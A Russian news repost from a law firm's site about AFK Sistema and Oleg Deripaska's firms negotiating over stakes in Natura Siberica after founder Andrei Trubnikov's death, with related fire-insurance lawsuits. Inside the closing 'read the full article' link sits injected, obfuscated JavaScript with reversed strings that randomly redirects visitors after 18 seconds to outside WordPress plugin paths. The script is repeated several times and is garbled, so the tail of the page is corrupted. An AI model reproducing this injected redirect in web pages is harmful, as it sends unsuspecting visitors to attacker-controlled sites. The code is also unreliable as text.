СМИ узнали о переговорах «Системы» и структур Дерипаски по долям в Natura Siberica

Комментарий Вадима Бородкина, советника Orchards, для газеты «Ведомости».

АФК «Система» Владимира Евтушенкова и структуры бизнесмена Олега Дерипаски ведут переговоры о распределении долей в компании Natura Siberica, сообщил Forbes со ссылкой на источники. 

Ранее АФК «Система» вела переговоры о покупке долей первой жены основателя компании Андрея Трубникова (умер в январе 2021 г.) Ирины и ее детей Дмитрия и Екатерины, писал The Bell. Затем третья (последняя) жена Трубникова Анастасия тоже смогла договориться о продаже доли, которую она должна получить при распределении наследства. Как пишет Forbes, на ее будущую долю может претендовать холдинг Евтушенкова. Если «Система» договорится одновременно с первой и третьей женами Трубникова, после распределения наследства ей может отойти от 85 до 90% Natura Siberica, утверждает издание. 

Помимо распределения долей между наследниками идут и многочисленные арбитражные разбирательства. В мае прошлого года к структуре Natura Siberica — компании «Первое решение» — был подан иск от «Эн+ Рециклинг». На эту компанию оформлены энергоснабжающие активы завода «Дозакл», на котором в прошлом году произошел пожар. Natura Siberica арендовала производственные помещения у завода. Затем на месте истца «Эн+ Рециклинг» сменила компания «Ингосстрах» — страховщик завода. «Ингосстрах» требует возместить почти 1,5 млрд руб., «Дозакл» — около 2,7 млрд руб. за ущерб, который образовался в результате пожара в производственном цеху. Как писал The Bell, и «Эн+ Рециклинг», и «Дозакл», и «Ингосстрах» связаны с Дерипаской. Источники Forbes утверждают, что структуры Дерипаски и Евтушенкова теперь ведут переговоры о распределении долей в Natura Siberica именно в рамках урегулирования иска. По его словам, стороны договорились поделить контрольный пакет поровну.

Среди брендов компании, кроме Natura Siberica, – «Рецепты бабушки Агафьи», Organic Shop и Planeta Organica. Андрей Трубников, основатель и основной владелец компании, в своем последнем интервью, которое он дал Forbes в конце декабря 2020 г., оценивал компанию в $500 млн. Генеральный директор Infoline Михаил Бурмистров ранее в разговоре с The Bell назвал $70–100 млн самой оптимистичной оценкой.

Но в январе 2021 г. Андрей Трубников умер, и с тех пор в компании продолжается корпоративный и наследственный конфликт. После смерти основателя его последняя (третья) супруга Анастасия Трубникова первой обратилась для открытия наследственного дела к нотариусу, выбрав Айгуль Карнаухову, рассказывал «Ведомостям» советник юридической фирмы Orchards Вадим Бородкин. Бородкин представляет интересы Ирины Трубниковой – первой супруги и бизнес-партнера Андрея Трубникова, которой принадлежит около 40% всей компании.

Читать статью $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews%2Fsearch%3Ftext%3D»>целиком.

Подпишитесь на Telegram Orchards

X